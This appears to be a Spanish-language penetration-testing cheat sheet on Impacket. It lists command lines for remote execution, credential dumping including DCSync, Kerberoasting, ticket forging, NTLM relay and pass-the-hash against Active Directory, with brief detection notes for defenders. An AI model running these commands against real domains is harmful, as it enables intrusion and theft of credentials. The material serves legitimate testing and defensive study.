Impacket
Impacket es una colección de scripts en Python que implementan protocolos de red Windows (SMB, Kerberos, MSRPC, LDAP). Es la caja de herramientas esencial para atacar Active Directory: ejecución remota, volcado de credenciales, ataques Kerberos y relay (ver área Windows & AD).
Scripts de ejecución remota
Sección titulada «Scripts de ejecución remota»psexec.py domain/user:pass@host # shell SYSTEM (ruidoso, crea servicio)wmiexec.py domain/user:pass@host # ejecución vía WMI (más sigiloso, semi-interactivo)smbexec.py / atexec.py / dcomexec.py # variantes por distintos mecanismos# todos soportan pass-the-hash: -hashes LM:NT (ver ad-creds)Credenciales
Sección titulada «Credenciales»secretsdump.py domain/user:pass@host # volcar SAM/LSA/NTDS (hashes, ver ad-creds)secretsdump.py -just-dc domain/user:pass@DC # DCSync: volcar TODOS los hashes del dominio # requiere privilegios de replicación (ver ad-creds/ad-persist) -> hashes de krbtgt, etc.Ataques Kerberos (ver Ataques Kerberos)
Sección titulada «Ataques Kerberos (ver Ataques Kerberos)»GetUserSPNs.py domain/user:pass -request # Kerberoasting (TGS de cuentas con SPN)GetNPUsers.py domain/ -usersfile users.txt # AS-REP roasting (usuarios sin preauth)ticketer.py / getST.py # forjar/solicitar tickets (golden/silver, delegación)# los hashes obtenidos se crackean con hashcat (tool-hashcat)NTLM relay y otros
Sección titulada «NTLM relay y otros»ntlmrelayx.py -tf targets.txt -smb2support # relay de NTLM a otros servicios (ver ad-ntlm) # combinado con responder/coerción (PetitPotam) -> uno de los ataques estrella en ADmssqlclient.py / rpcdump.py / samrdump.py # MSSQL, enumeración RPC/usuariosUso con hashes (pass-the-hash)
Sección titulada «Uso con hashes (pass-the-hash)»# en casi todos los scripts: -hashes LM:NT en vez de contraseñapsexec.py -hashes :<NThash> domain/user@host # PtH (ver ad-creds)# Kerberos: -k -no-pass con un ticket en KRB5CCNAME (pass-the-ticket)Blue Team / uso
Sección titulada «Blue Team / uso»- Impacket cubre ejecución remota (psexec/wmiexec), volcado (secretsdump/DCSync) y Kerberos (roasting, tickets) en AD.
- Soporta pass-the-hash/ticket en casi todos los scripts (Volcado de credenciales).
- ntlmrelayx + coerción es uno de los ataques estrella de AD (NTLM Relay).
- Para el defensor: su actividad (creación de servicios, DCSync, roasting) genera eventos detectables (Detección & logging, Artefactos de Windows).
Trucos y errores comunes
Sección titulada «Trucos y errores comunes»- Usa el formato de credencial correcto:
dominio/usuario:passo-hashes :NTLM; muchos fallos son de sintaxis de auth. - Error típico: desajuste de reloj/Kerberos (KRB_AP_ERR_SKEW); sincroniza la hora con el DC (
ntpdate/faketime). secretsdumpnecesita privilegios altos; para DCSync hace falta una cuenta con derechos de replicación.- Scripts clave: psexec/smbexec/wmiexec (ejecución), secretsdump (volcado), ntlmrelayx (relay), GetUserSPNs (kerberoast).
Checklist de prueba
Sección titulada «Checklist de prueba»- Ejecución remota (psexec/wmiexec) con credencial o hash (PtH)
- secretsdump para SAM/LSA; DCSync con privilegios de replicación
- Kerberoasting (GetUserSPNs) y AS-REP (GetNPUsers) → crackear (hashcat & John)
- ntlmrelayx para relay NTLM (NTLM Relay)
- Pass-the-hash/ticket donde aplique (Volcado de credenciales)
- Enumeración MSSQL/RPC si procede
- Documentar; consciente de la detectabilidad